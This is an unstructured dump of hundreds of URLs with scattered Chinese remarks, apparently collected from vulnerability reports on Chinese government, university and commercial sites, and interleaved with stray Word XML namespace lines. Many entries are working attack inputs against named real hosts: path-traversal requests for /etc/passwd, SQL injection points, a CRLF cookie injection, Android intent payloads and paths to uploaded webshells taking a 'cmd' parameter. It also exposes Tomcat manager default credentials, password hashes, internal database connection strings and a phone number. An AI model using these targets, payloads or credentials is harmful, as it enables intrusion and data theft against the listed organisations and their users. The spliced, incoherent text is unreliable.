xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml inurl:Flight/DomesticTicketTejiaAirport.asp http://www.wugang.gov.cn/jcms/workflow/objectbox/selectx_list.jsp?id=1 http://www.wugang.gov.cn/jis/objectbox/selx_list.jsp?id=1 http://xxgk.nbjiangbei.gov.cn/xxgk/workflow/objectbox/selectx_list.jsp?id=1 http://www.lzcgq.gov.cn/jcms/workflow/sys/que_dictionary.jsp?que_keywords1=aaa http://www.taojiang.gov.cn//jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1 http://www.wugang.gov.cn/jcms/m_5_5/m_5_5_1/que_flow.jsp?que_keywords1=aaa http://management.ysx.gov.cn/jis/manage/datasbase/closeup.jsp?id=1 http://management.ysx.gov.cn/jis/manage/datasbase/startup.jsp?id=1 http://www.wugang.gov.cn/jcms/m_5_3/attach/que_attach_choose.jsp?classid=-1&que_keywords1=1 http://www.wugang.gov.cn/jcms/m_5_3/attach/que_attach_choose.jsp?classid=-1&que_keywords1=1 http://www.sheshantravel.com/jcms/workflow/objectbox/selectx_czuserlist.jsp?appid=1&flowcode=2&nodecode=3&handlerid=4 http://www.sheshantravel.com/jcms/workflow/objectbox/selectx_czuserlist.jsp?appid=1&flowcode=2&nodecode=3&handlerid=4 http://www.czjj.gov.cn/jcms/m_5_e/module/messagebook/opr_messagebook_column.jsp?fn_billstatus=D&i_ID=1 http://sha.sinotrans.com/jcms/m_5_e/init/download/downfile.jsp?filename=1 https://www.jssy.cn/portal/index.jsp http://dfi.bnuz.edu.cn/college/news.php?newsid=4” www.fx678.com/charge/free_charge_newlist.asp?pointid=453 http://www.165xj.com/install/ http://demo.magicwinmail.com:6080 http://bbs.e23.cn/ http://118.186.245.5:9084/TzxMember/member.jsp http://221.10.252.24:8081/default.asp http://221.10.252.24:8081/ http://221.10.252.24:8081/mps/ inurl:/ws2004/ inurl:/vc2003/login/ http://democn.mall-builder.com http://democn.mall-builder.com/product-detail-521.html http://mse.hebut.edu.cn/e/master/login.aspx http://mob.118114.cn http://mob.118114.cn/MenuTree.aspx?permissionid=120001 http://59.151.42.145/admin/ http://count.hjsm.tom.com/ http://game.tom.com/tomqp/index.php http://post.tom.com/qa/env.php http://slides.discovery.tom.com/info.php http://sales.vip.tom.com/net1hao/phpinfo.php http://search.weiqi.sports.tom.com/%3f.jsp http://auto.tom.com/cx/ sales.vip.tom.com/php http://www.lfxy.gov.cn/xyb/credit/queryGoodRecordDetail.action http://download.csdn.net/download/shuaimengxia/7037337 http://blog.csdn.net/yfbaini/article/details/38745503 http://e.kesion.com http://e.kesion.com/user/course/MyCourseOrder.aspx,我的订单,3个框框都无过滤,可注入: http://www.weekedu.com/ http://www.weekedu.com/user/MobileBind.aspx http://域名(ip)/xsxjxtdl.aspx http://autosite.idcs.cn/webmall/query.php?catid=%27%29 intitle:TopOffice协同办公系统 http://51talk.com:8080/mon/mem/memadmin/index.php?action=set.con http://wap.js.10086.cn/mall/mall/activity.do?pageCont=order_detail&orderid=011012073020150 http://jk.xd.com/ http://w.k189.cn/index.php/Wap/WBind/isZjTelecom http://189.tyquan.cn//BDServlet http://oice.hbu.edu.cn/data.asp http://www.nyzsb.com.cn/show_news.php?id=439“ http://qqhx.qq.com/cp/a20131014hxlighten/### http://www.hlca.gov.cn/3g_news_list.php?cid=14&gid=15 http://www.hlca.gov.cn/new.php?cid=4 http://www.hlca.gov.cn/newsshow.php?cid=4&id=1018 http://ce.wooyun.org/ http://ce.wooyun.org/index.php?do=login&act=logout http://preview.mail.189.cn:8081/ http://preview.mail.189.cn:8081/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml pince:Txpd1jQc/xwhISIqodEjfw==:staff,website filch:KmZIq2RKXAHV4BaoNHfupQ==:staff http://preview.mail.189.cn:8081/resin-doc/examples/security-basic/viewfile?file=index.jsp http://java.sun.com/jsp/jstl/core http://wooyun.org/bugs/wooyun-2014-058757 http://220.169.236.108:8044 http://zzb.taicang.gov.cn/ http://zzb.taicang.gov.cn/test.txt http://192.168.1.102:8080/365SERVICE/userfiles/ jdbc:oracle:thin:@127.0.0.1:1521:ORCL http://news1.hbcf.edu.cn/gjjy/new.php?id=1017&typeid=0&borderid=0” http://klpr.ibcas.ac.cn/admin/login.asp http://demo.magicwinmail.com:6080 http://comment.chinadaily.com.cn/sp_comments.shtml?cid=3-1-109 http://218.206.24.135:81/iot/download?fn=../../../../../etc/passwd http://www.zgc-ft.gov.cn/ http://www.zgc-ft.gov.cn/cms/webapp/column.jsp?ColumnID=53 http://210.21.5.9/ http://210.21.5.9/files/ http://app.finance.ifeng.com/finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=jjdm&ordertype=desc file:///etc/passwd xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006 xmlns:o="urn:schemas-microsoft-com:office:office xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math xmlns:v="urn:schemas-microsoft-com:vml xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing xmlns:w10="urn:schemas-microsoft-com:office:word xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml http://convention.mcdonalds.com.cn/cn/login.aspx http://democn.mall-builder.com http://democn.mall-builder.com/main.php?m=product&s=admin_orderdetail&id=201408221129296 http://democn.mall-builder.com/api/order.php?id=201408221129296&type=预存款支付&order_id=201408221129296&price=598&extra_param=&statu=1&auth=27a2824875956f6d6e268a992ad3f8c4 http://democn.mall-builder.com/pay/ http://www.sxdt.gov.cn:8080/ http://www.hnzwgk.gov.cn/list.php?code=003051081&groupcode=020600 http://xxgk.jiuhuashan.gov.cn/list.php?code=RF001 http://www.xinnet.com/online/shopcart.do?method=updateShopCart&purchaseYears=%202&timeUnit=Y&uuid=D0D9BA74BA0A48CDA6DC22E0A5A12227&selectType=a http://srs.zhaopin.com/login.action https://www.greeninhand.com/product.php?CateID=6 https://www.greeninhand.com/product.php?CateID=6&ProductID=177&Page=0 http://jiuye.nwu.edu.cn/detail.jsp?id=2886 http://220.160.119.31:81/tabid/289/Default.aspx http://220.160.119.31:81/tabid/289/Default.aspx labs.chinamobile.com/admin/help.php.bak http://szgy.sxjs.gov.cn/new/Manage/Login.aspx http://211.103.186.177/ http://211.103.186.177/doLogin.do http://211.103.186.178/ https://app.xmhrss.gov.cn/wcm/servlet/MedicareDrugsServlet?ypmc00=h&sfybxm=Y&x=25&y=10 http://www.coop.ln.gov.cn/xw_info.asp?id=4835 http://www.coop.ln.gov.cn/xw_info.asp?id=4835 http://www.coop.ln.gov.cn/xw_info.asp?id=4835 http://58.42.247.98/soa http://60.166.52.178:9090/soa/portal/indexAC.do http://183.62.9.141/soa http://210.73.45.131/soa http://120.69.82.99/soa http://202.109.244.119/soa/portal/indexAC.do http://219.148.61.8:8000/soa/portal/indexAC.do http://58.213.145.73/soa/portal/indexAC.do http://202.127.12.27/soa/portal/indexAC.do http://soa.ip.gov.cn/soa/portal/indexAC.do http://pa.nbipo.gov.cn/soa http://123.157.156.200/soa http://202.99.194.152:9000/soa/portal/indexAC.do http://61.178.21.182/soa http://222.240.166.58:8001/soa http://139.210.164.131/soa http://124.133.35.226:5780/soa http://www.fxxt.nxipo.gov.cn http://27.223.28.115:81/soa http://218.57.139.5/soa/portal/indexAC.do http://222.34.136.72/soa/portal/indexAC.do http://202.108.243.221/soa http://218.60.146.232/soa/ http://fx.hlipo.gov.cn/soa http://61.138.98.215/soa http://116.66.35.202/soa/portal/indexAC.do http://60.28.62.184/soa http://59.46.163.22/soa/portal/indexAC.do http://218.61.146.44/soa/portal/indexAC.do http://218.70.88.213/soa/ http://218.77.186.204/soa/portal/indexAC.do http://220.249.102.17/soa http://118.112.188.132/soa/ http://onan.gxstd.com/soa/portal/indexAC.do http://219.140.56.154 http://61.157.78.21/soa/portal/indexAC.do# http://www.fjipo.gov.cn:81/soa/ http://211.142.200.86/soa www.56xj.net http://ttc.njnu.edu.cn/web.rar http://spzx.njnu.edu.cn/web.rar http://gpjh.njnu.edu.cn/web.rar http://xtoa.lbex.com.cn/Default.aspx http://jyx.ndnu.edu.cn/index.html http://221.194.128.113:8095/BdlbsManager/ jdbc:oracle:thin:@10.0.18.42:1521:bddb jdbc:oracle:thin:@221.194.128.113:1538:bddb jdbc:oracle:thin:@221.194.128.114:1539:ykdb jdbc:oracle:thin:@123.125.16.139:1540:zxdb http://www.seip.org.cn jdbc:mysql://192.168.1.102:3309/usp jdbc:mysql://10.1.1.15:3306/seip_db2?useUnicode=true&characterEncoding=GBK http://www.tjnklss.gov.cn/gonggao/gonggao_detail.asp?id=144 http://www.yp.edu.sh.cn/magazine/IssueDetail.aspx?iid=18535f3a-6d13-4428-be7d-63093c1ae689 http://wzmis.ctbu.edu.cn/showc.aspx?cid=2437 http://wenwen.sogou.com/z/q478438204.htm http://www.windexpress.cn/ http://120.193.64.194:8088/serverLog.do msgid:262 num:260mobile:15007533209 http://202.103.194.214:8003/ http://art.buaa.edu.cn/english/js/diy3.asp http://art.buaa.edu.cn/english/js/no22.asp http://www.creditcard.com.cn/plus/mytag_js.php?aid=9090 http://www.hedb.xmu.edu.cn/admin_info.asp http://www.hedb.xmu.edu.cn http://www.hedb.xmu.edu.cn/admin_data.asp http://www.hedb.xmu.edu.cn/admin_data.asp?action=BackupData http://www.hedb.xmu.edu.cn/admin_data.asp?action=RestoreData http://www.hedb.xmu.edu.cn/admin_login.asp http://www.hedb.xmu.edu.cn/admin_info.asp http://www.hedb.xmu.edu.cn/conn.asp http://www.hedb.xmu.edu.cn/data.asp http://www.hedb.xmu.edu.cn/database/ http://www.hedb.xmu.edu.cn/default.asp http://www.hedb.xmu.edu.cn/default2.asp http://www.hedb.xmu.edu.cn/down.asp http://www.hedb.xmu.edu.cn/editor/ http://www.hedb.xmu.edu.cn/image/ http://www.hedb.xmu.edu.cn/inc.asp http://www.hedb.xmu.edu.cn/info.asp http://www.hedb.xmu.edu.cn/left.asp http://www.hedb.xmu.edu.cn/md5.asp http://www.hedb.xmu.edu.cn/s/ http://www.hedb.xmu.edu.cn/stat/ http://www.hedb.xmu.edu.cn/test.asp http://www.hedb.xmu.edu.cn/top.htm http://www.hedb.xmu.edu.cn/temp.asp http://www.hedb.xmu.edu.cn/temp/ http://www.hedb.xmu.edu.cn/upfile/ http://www.hedb.xmu.edu.cn/update.asp http://www.hedb.xmu.edu.cn/web.config http://www.hedb.xmu.edu.cn/admin_admin.asp http://www.hedb.xmu.edu.cn/database http://www.hedb.xmu.edu.cn/admin_index.asp http://www.hedb.xmu.edu.cn/Editor http://www.hedb.xmu.edu.cn/image http://www.hedb.xmu.edu.cn/s http://www.hedb.xmu.edu.cn/stat http://www.hedb.xmu.edu.cn/temp http://www.hedb.xmu.edu.cn/reports/ http://www.hedb.xmu.edu.cn/reports http://www.hedb.xmu.edu.cn/q/ http://www.hedb.xmu.edu.cn/admin_main.asp http://www.hedb.xmu.edu.cn/q http://www.zinfos.net/Product/cp1/ http://www.bjut.edu.cn/department/gjjlhzc/wsc/WEB-INF/classes/com/mysql/jdbc/Buffer.java http://rsc.henu.edu.cn/ http://rsc.henu.edu.cn:8080/FileResource/ http://rsc.henu.edu.cn:8080/FileResource/7452/ http://rsc.henu.edu.cn:8080/FileResource/7452/Aspx.aspx http://bmd.yunhosting.com/,抓包后发现是境外转发申请平台proxymaster.hk.yunhosting.com,测试如下: http://proxymaster.hk.yunhosting.com http://202.120.81.220:81/xsgz/news/news_details.php?news_id=45 http://202.120.81.220:81/xsgz/notice/notice_details.php?notice_id=45 http://202.120.81.220:81/xsgz/jobinfo/jobs_details.php?info_id=34 http://www.haxx.lss.gov.cn/msg/more.php?SortID=12 http://life.gwbnsh.net.cn/index.action http://zkzs.nau.edu.cn/ http://zkzs.nau.edu.cn/1/sm.asp?id=3 http://voice.sohu.com/tree/page.php?id=diissrld&beg=0&end=20 http://ifl-info.ecupl.edu.cn/searcharticle.asp?WhichLanmu=6&WhatToSearch=All&WhichYear=9999 http://www.fj.vnet.cn/wj/Page/DigPrize.aspx?id=1 http://www.fj.vnet.cn/wj/Page/DigPrize.aspx?id=1 http://59.151.119.94:8081/cloud/questionnaire/doQuestionnairePreview.action?questionnaireId=11&caseId=123&customerId=9396 http://218.25.83.8/fcjxyjs/index.jsp http://bb.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=1 http://www.sdx.sh.cn/tg/loginLogoutAction_loginUI.action http://www.1caitong.com/ inurl:/custom/GroupNewsList.aspx http://eps.umgg.com.cn/custom/GroupNewsList.aspx?groupId=121&child=true http://eps.csrcj.com/custom/GroupNewsList.aspx?GroupId=141&child=true http://eps.rizhaosteel.com/custom/GroupNewsList.aspx?GroupId=142&child=true http://azbid.zj31.com.cn/custom/GroupNewsList.aspx?GroupId=58&child=true http://eps.zzvcom.com/custom/GroupNewsList.aspx?GroupId=142&child=true http://www.daqobid.com/custom/GroupNewsList.aspx?GroupId=142&child=true http://eps.delongsteel.com/custom/GroupNewsList.aspx?GroupId=140&child=true http://zh404eps.cn/custom/GroupNewsList.aspx?groupId=58&child=true http://www.sdlg.info/custom/GroupNewsList.aspx?GroupId=58&child=true http://eps.xinjinsteel.com:90/custom/GroupNewsList.aspx?GroupId=141&child=true http://jingpai.datuhe.com/custom/GroupNewsList.aspx?GroupId=142&child=true http://wscg.hgfq.cn/custom/GroupNewsList.aspx?GroupId=141&child=true http://www.lzpbzx.com/custom/GroupNewsList.aspx?GroupId=148 http://eps.eastcom.com/custom/GroupNewsList.aspx?GroupId=181 http://wscg.hgfq.cn/custom/GroupNewsList.aspx?companyId=&child=true&buyGroupid=1302&groupId=38 https://eps.xd.com.cn:8084/custom/GroupNewsList.aspx?GroupId=114&buyGroupId=1178 http://ygcg.xuangang.com.cn/custom/GroupNewsList.aspx?typeObj=t58&groupId=58 http://jingpai.datuhe.com/custom/GroupNewsList.aspx?GroupId=142&child=true http://cg.bjxinheng.com:8000/custom/GroupNewsList.aspx?GroupId=58&child=true http://218.203.215.218/custom/GroupNewsList.aspx?GroupId=58&child=true http://eps.xltl.com.cn/custom/GroupNewsList.aspx?typeObj=t58&groupId=58 http://www.dyqyfw.gov.cn http://sse1.paipai.com/0,6001/s-2c4po1bq1su59ql--1-60-77-6001--3-4-1----2-2--128-1-0.html?PTAG=%0aSet-Cookie:%20badcookie=attack_here;path=/;%20domain=.paipai.com http://61.133.142.61/uniszx/common/user/loginpage.html http://61.133.142.61/uniszx/common/user/user!query.action?id=5 http://61.133.142.61/uniszx/common/user/user!query.action?id=1 http://61.133.142.61/uniszx/common/user/user!query.action?id=2 http://61.133.142.61/uniszx/common/user/user!query.action?id=3 http://61.133.142.61/uniszx/common/user/user!query.action?id=xxx http://61.133.142.61/uniszx/common/user/user!query.action http://zscq.e23.cn/shownews.jsp?NewsID=640 http://zscq.e23.cn/Search.jsp?page=1&keyword= http://www.***.com/hyl/Lists/List1/Allitemsg.aspx http://www.ciscouc.com/aboutView.jsp?id=1 http://www.xanet.net/case.php http://www.168myjob.com/topic.php?action=show&channelID=3&topicID=4&zpID=7822 http://www.168myjob.com/topic.php?action=show&channelID=3&topicID=4&zpID=99999999 http://www.168myjob.com/topic.php?channelID=9&topicID=24 http://www.jnjt.gov.cn/Web/Area.aspx?area_code=XXGK http://progress.eic.org.cn/index.php/index/login https://github.com/NewNapoleon/test/blob/b27de80c43471ff1db03ef8ee5b79126ddf2491c/eleveninfoASS.py http://nanhu2.com.cn/ewebeditor/admin http://app.image.baidu.com/photos/LOGIC/webapp/download.php?download_url= http://www.10086-sms.com/superadmin/index.action http://www.idexpress.com.cn/cgi-bin/GInfo.dll?WebPic&w=shkdwy&order=通过该注入点可以获得该网站的八个数据库,六百多张表,包含很多公司的业务信息和客户信息,而且通过该注入点得到的权限就是管理员权限,无需提权可以直接获得大量数据。 http://x.sankuai.com/app/colleague?toolbarVisible=0&titlebarVisible=0 http://xai.xm.sankuai.com/app/rookie?type=1&offset=0&limit=20 https://github.com/baotiao/Asenal/blob/f623256b7c420b7cebe02f26cc6d03c2fde91113/script/python/server.py http://www.lyfz.gov.cn/xl.txt http://www.lyfz.gov.cn/xl.asp http://58.213.19.85/ http://www.wooyun.org/bugs/wooyun-2014-073659/trace/9b8168bb886443ec301bc0fd783bc9b5 www.hrbnu.edu.cn,大学一般都是有内网的。 http://jy.hrbnu.edu.cn这个二级域名有注入。是个帝国cms的站,管理员关闭的PHP错误,所以没找到路径,写不了shell,找到了PHPMYADMIN,于是就试试写UDF提权,随然没成功,但是把操作也记录下; http://qixiang.heshan.gov.cn/admin/admin.asp?logout=true http://h.bilibili.com/list?uid=4514 http://oa.bjhospital.net/ http://189.180.16.235/ http://113.182.179.91/ http://187.148.169.94/ http://175.141.5.65/ http://music.google.cn/search?newwindow=1&q=inurl%3Afunonews.ASP%3FID%3D&btnG=Google+%E6%90%9C%E7%B4%A2 http://lib.hebiace.edu.cn/dzb/admin/chklogin.asp?password=1&Submit=%c8%b7%20%b6%a8&admin=1 http://www.71etop.com/index.php url:http://125.88.10.244:8081/manager/html user:admin url:http://222.74.204.45:8081/manager/html user:tomcat pass:tomcat http://xmsc.zhuzhou.gov.cn/ArticleMocn.asp http://doc.baidu.com/view/7826b53c580216fc700afdab.html http://info.pinyin.sogou.com/ime_push/getxinci.php?activeprocess=Wireshark.exe&adurl=http://info.pinyin.sogou.com/ime_push/sgse_ad/sgse_s_all_new.php&configver=361&h=7E4AF9C13B1A52DB231E36F25A5A2038&id=Y10000001&newwordver=1408768246&pageurl=../../../../../../../../../../etc/passwd&passport=&ppversion=3.0.0.1825&r=0000_&v=7.2.0.2394 http://info.pinyin.sogou.com/ime_push/getxinci.php?activeprocess=Wireshark.exe&adurl=http://www.lijiejie.com/&configver=361&h=7E4AF9C13B1A52DB231E36F25A5A2038&id=Y10000001&newwordver=1408768246&pageurl=link_index_new.php&passport=&ppversion=3.0.0.1825&r=0000_&v=7.2.0.2394 http://www.gxtcmu.edu.cn/show_bosi.aspx?id=9076 http://xiaoli.xidian.edu.cn/inc/js.php?id=1 http://www.jletc.gov.cn/showgg.php?id=39240 http://218.206.191.49:8001/login.do http://218.206.191.49:8001/login.do?userPassword=123456789&userCode=1 http://cslab.hitwh.edu.cn/admin/ http://jpkc.whcm.edu.cn/Course/admin_login.asp http://mail.whcm.edu.cn/manage/login.aspx http://wcm.gdf.gov.cn/tbtj/tbtj.php?id=15 http://61.128.198.132/ http://www.sast.org.cn/index.php?id=2025&action=detailPage&type=article&part_id=120 http://209.150.97.19/(美国一个机房) http://134.147.166.17/ http://207.255.179.97/ http://81.10.188.54/(奥地利的公路) http://210.128.213.133/(日本,办公室,晚上都下班了,所以看不见人) http://160.194.154.57(日本Meisei http://g.tffstore.com http://gyjdi.jmu.edu.cn/information_more.php?id=44 http://60.28.168.181:8081/ http://210.22.8.98/login.action登陆界面,依然没有验证码,可以爆破,但是这样有些太蠢了,灵光一现,试试万能密码! http://star.umiwi.com/ http://star.umiwi.com/tools/main.php?func=starinfo http://star.umiwi.com/tools/main.php?func=add http://flagnet.imu.edu.cn/tuangongwei/index.html inurl:Flight/DomesticTicketTejia.asp http://demo1.huaruisoft.com/ http://demo1.huaruisoft.com/news/NewsList.aspx?KeyWord=__sqlin__ http://www.visioninnovation.com.cn/topic.php?channelID=6&topicID=13 http://www.sdta.gov.cn/ http://admission.whu.edu.cn/CooCourseView.aspx?id=181 http://www.tyut.edu.cn/slxy/infoshow.asp?id=917&typeid=1&smallid=58 https://vpn.airchinaf.com/prx/000/http/localhost/login http://bbs.pigai.org/ http://61.161.127.159/bizom/pages/login.do http://58.68.255.135 http://58.68.255.136 http://58.68.255.137/ http://58.68.255.138/ http://58.68.255.148/admin http://58.68.255.149/Login.aspx?ReturnUrl=%2fdefault.aspx http://jpkc.bsu.edu.cn/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://www.eol.sdu.edu.cn/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://eol.hgzyxy.com/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://eol.ynufe.edu.cn/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://cc.ustb.edu.cn/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://aaol.imust.cn/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://course.pkuschool.edu.cn/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://jxpt.cuc.edu.cn/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://116.252.254.221:8024/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://www.diancms.com/jiaocheng.aspx http://demo.zoomla.cn/Mis/OA/ http://demo.zoomla.cn/User/UserZone/Default.aspx http://mkszyxy.cug.edu.cn/showart.asp?id=272 http://www.ahjzy.com.cn/news/showart.asp?id=1080 http://www.28ka.com inurl:linklist.asp?TlinkID= inurl:PositionSeek.asp http://jy.sthu.edu.cn http://zczx.lzu.edu.cn/register/manager/eregisterstu/studentERegisterCanSee.do?id=1088367&see=0&=0&fromBase=1 http://zczx.lzu.edu.cn/register/manager/eregisterstu/studentERegisterCanSee.do?id=1088367&see=0&isAdmin=0&fromBase=1 http://zczx.lzu.edu.cn/register/manager/eregisterstu/studentERegisterCanSee.do?id=1088366&see=0&isAdmin=0&fromBase=1 http://www.edong.com/Host/Gspace_list.aspx?Product_ClassId=1&line_Id=3 http://routes.sdta.cn/da3/client/shandong/tjxl/query.action http://sys.59.cn/system/login.asp http://sys.59.cn/system/Login_CK.asp http://sys.59.cn/system/login.asp http://www.snepb.gov.cn/tsxx.asp?id=103838 http://hao.ikang.com http://hao.ikang.com/?city=0021&Action=Operator&hospid=002 http://121.28.83.66:8080/zfba/stdownload.jsp?path=uploadFile/file5e8082408319.doc http://121.28.83.66:8080/zfba/stdownload.jsp?path=stdownload.jsp http://121.28.83.66:8080的tomcat配置也是够懒的。。。 http://www.pigai.org/corpus/star/index.php?q=crisis&pageno=2 http://xxoo.com/v1.php tel:10086 http://www.pigai.org/corpus/so/snt.php?q=consider&corpus=sino&pageno=2 http://218.241.158.242/ http://www.1ysg.com/statics/uploads/touimg/20140825/22416063969950.jpg_160160.PHP黑页已挂你懂得,利用审查元素修改头像的后置。很鸡肋的漏洞, www.gysjks.com itsm.wisedu.com/detach.portal?.pen=pe81&.ia=false&action=bulletinBrowser&.pmn=view&bulletinId=0261e216-f149-11df-b88f-253e3a651013 http://project.wisedu.com/ http://202.38.194.239/index.aspx http://202.38.194.239/admin/.l.o.g.i.n.scut-graduate http://202.38.194.239/admin/admin.asp http://xxyxjc.miit.gov.cn/ http://xxyxjc.miit.gov.cn/core/index/login.jsp http://xxyxjc.miit.gov.cn/ckeditor/uploader/upload/images/file1408973312330.jsp?cmd= http://xxyxjc.miit.gov.cn/ckeditor/uploader/upload/images/file1408976269908.html http://rexian.e23.cn/list.jsp?cid=7722 http://110.167.173.18/default.asp http://125.**.**.5:7001/ismp/spportal/ http://dg.jjcmw.cn/plus/mytag_js.php?aid=9090 www.jiathis.com某过期活动页面可导致sql注入(POST方式),仅jiathis业务有近50w条客户数据泄漏。后台管理权限泄漏,可更改任意用户信息及运营数据。 http://www.jiathis.com/event/iphone5/ http://www.tzlxx.cn/ http://**.**.**/_ http://**.**.** http://**.**.** http://**.**.** http://**.**.**/ http://www.cs2c.com.cn/index.php?id=117 http://sqlmap.org http://qcyg.e23.cn/phpsso_server/?m=admin&c=index&a=init&forward= cn:9080/ com.tencent.mtt/com.tencent.mtt.debug.DbgMemWatch;end android:show_fragment=com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment;B.confirm_credentials=false;launchFlags=0x00008000;end intent:http://drops.wooyun.org/webview.html#Intent;component=com.android.browser/com.android.browser.BrowserActivity;end intent:package:org.wooyun.hiwooyun#Intent;action=android.intent.action.DELETE;end http://www.0745kttz.com/front/aboutUs/aboutUs.php?compTypeId=9 http://www.0745kttz.com/front/helpCenter/help.php?TypeId=27 http://www.0745kttz.com/front/news/newsList.php?parentID=25 http://0745hhszx.china720.cn/news.php?menuId=2 http://0745hhszx.china720.cn/zzgc_xx.php?menuId=9 http://0745hhszx.china720.cn/company_xx.php?menuId=1 http://www.720mt.com/ctmt.php?id=0 http://www.720mt.com/news_show.php?id=98 http://www.720mt.com/xxmt.php?id=4 http://8327.china720.cn/run.php?partid=1 http://www.yywysj.com/run.php?partid=4 http://www.hhgjdf.com/run.php?partid=1 http://www.kakazhou.com/run.php?partid=19 http://www.hhhljt.com/run.php?partid=2 http://zhiyuanrenli.com/run.php?partid=2 http://sai-shuo.com/run.php?partid=1 http://www.hhsjx.cn/run.php?partid=2 http://ggsfys.hhwanchang.com/run.php?partid=21 http://www.4008800410.com/run.php?partid=2 http://www.aifeicm.com/run.php?partid=1 http://www.95hds.com/run.php?partid=13 http://hhxlsj.com/run.php?partid=2 http://mili.umiwi.com/card/usercard http://star.umiwi.com/tools/result.php http://i.g-fox.cn/i.g-fox.cn.zip http://222.32.90.7:8080/Default.aspx http://222.32.90.7/Default.aspx www.suaee.com http://211.137.254.234:9090/ http://www.gtzy.hunan.gov.cn:8080/wcm/ http://www.basha.com.cn)里面啥都有啊,送礼专用啊,看着好眼馋啊。 http://pay.basha.cn/basha/PayRedirect.aspx?no=M14082661458),手一滑,打出一个分号。就报错咯。 http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://www.sdx.sh.cn/apex-cms/reg.jsp http://shop.pep.com.cn/ http://mec.ikang.com/showexam_exam.php?v=11032128&uname=kefupeixun&uid=11760 http://mec.ikang.com/showexam_exam.php?v=11032128&uname=kefupeixun&uid=11760 http://mec.ikang.com/showexam.php http://mec.ikang.com/showexam_exam.php?v=11032128&uname=kefupeixun&uid=11760 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://app.sxfc.gov.cn/Services/VoteResult.jsp http://www.hotouzi.com/customers/index.html http://mail.tsari.tsinghua.edu.cn/ http://national-life.ikang.com/admin http://42.120.***.** http://www.cqcca.com/phpmyadmin/index.php?db=cqccadb2&token=7b77aaf405271a03037e251f359510a7 www.neitui.me http://www.neitui.me http://m.xabaili.com http://m.xabaili.com/shop/detail.php?goods_id=80 http://webmail.xabaili.com/index.php http://mail.xabaili.com/update/ post:http://www.128cai.com/bbs/faq.php http://oa.homevv.com/login.jsp http://oa.homevv.com/attachFiles/uploadDocument/201408/452bc858929d4b069a85e30fc138a434.jsp http://www.pengpengmall.com/mall/goods/help/index.html?id=3462617 http://wenwen.sogou.com/cate/?cid=323551232&pg=1 http://wenwen.sogou.com/z/q589887143.htm?ch=wtk.title&lightframework=on http://wenwen.sogou.com/z/q589887181.htm?ch=wtk.title&lightframework=on site:health.ikang.com http://qq.health.ikang.com/loginui http://baidutj.health.ikang.com/loginui http://nyfesco.health.ikang.com/loginui http://ibm.health.ikang.com/loginui http://www.samsoncn.com/ http://www.samsoncn.com/product/Customers.aspx http://tis.hrbeu.edu.cn http://www.cjebm.org.cn http://xbskb.ysu.edu.cn http://www.j-smu.com http://www.hxyxqk.com.cn http://heuxb.hrbeu.edu.cn http://lkkf.njfu.edu.cn http://www.psytxjx.com http://www.xfcjwkzazhi.cn http://www.zgpwzz.com http://jee.ieecas.cn http://xxzz.cintcm.com http://www.ydsjjs.com http://yxxb.xjtu.edu.cn http://jxyj.ysu.edu.cn http://xb.hznu.edu.cn http://emc.hrbust.edu.cn http://www.zgxxwkzz.com http://www.syfsxzz.com.cn http://gjzy.cintcm.com http://www.cjam.net.cn http://www.qbzz.org http://www.cibj.com http://www.zgmnwk.com http://xbskb.jssvc.edu.cn http://www.jwit.org.cn http://xbskb.jssvc.edu.cn http://xbzrb.tjujournals.com http://www.cjcep.com http://www.fmmuxb.cn http://dlxb.nefu.edu.cn http://qhxb.lib.tsinghua.edu.cn http://slgc.nefu.edu.cn http://jjlyj.csuft.edu.cn http://hlgxb.hrbust.edu.cn http://www.cjrccm.com http://xbzkb.jssvc.edu.cn http://xuebao.ysu.edu.cn http://www.ddgzyckx.com http://www.lsjg.cn http://jhau.paperopen.com http://skxb.csuft.edu.cn http://zgwstj.paperonce.org http://nldxb.njfu.edu.cn http://xuebao.zjc.edu.cn http://journal.lut.cn http://xxgk.yuanan.gov.cn/gov/setup/index.html http://222.134.129.66:800/Initial/Login.aspx,点击“忘记密码”,输入用户名(随意输入)和邮箱(格式要正确)抓包,tbxName存在注入。POST内容如下 http://222.134.129.66:800 http://www.bjguahao.gov.cn/ url:http://60.216.102.82:80/manager/html user:admin https://ddp.volvocars.com/login.action http://210.42.27.60:8081/news_info.jsp?news_id=309 http://service.clo.com.cn/ http://service.clo.com.cn/Common/EventDtl/Event_Dtl.aspx?ServiceCode=FW00000001 http://service.clo.com.cn/Common/EventDtl/Event_Dtl.aspx?ServiceCode=FW00074415 http://mail.bdtvu.net.cn/webmail/login9.php http://202.102.41.12:8180/ http://202.102.41.12:8180/uc_server/ http://202.102.41.12:8180/admin.php http://202.102.41.12:8180/t.php http://202.102.41.12:8180/kh/ http://183.61.117.149:8080/ http://124.205.115.175/login.jsp url:http://124.205.115.175:80/manager/html user:tomcat pass:tomcat http://124.205.115.175/system/ http://www.pdsdxscg.cn/article.asp?id=1004 http://www.pdsfgw.gov.cn/article.asp?id=1199 http://www.pdssl.gov.cn/Article.Asp?id=1349 http://www.hnfljt.cn/article.php?id=1057 http://www.zhimabai.com/article.asp?id=487 http://www.hnxp666.com/Article.Asp?id=6475 http://www.3156777.com/article.asp?id=151 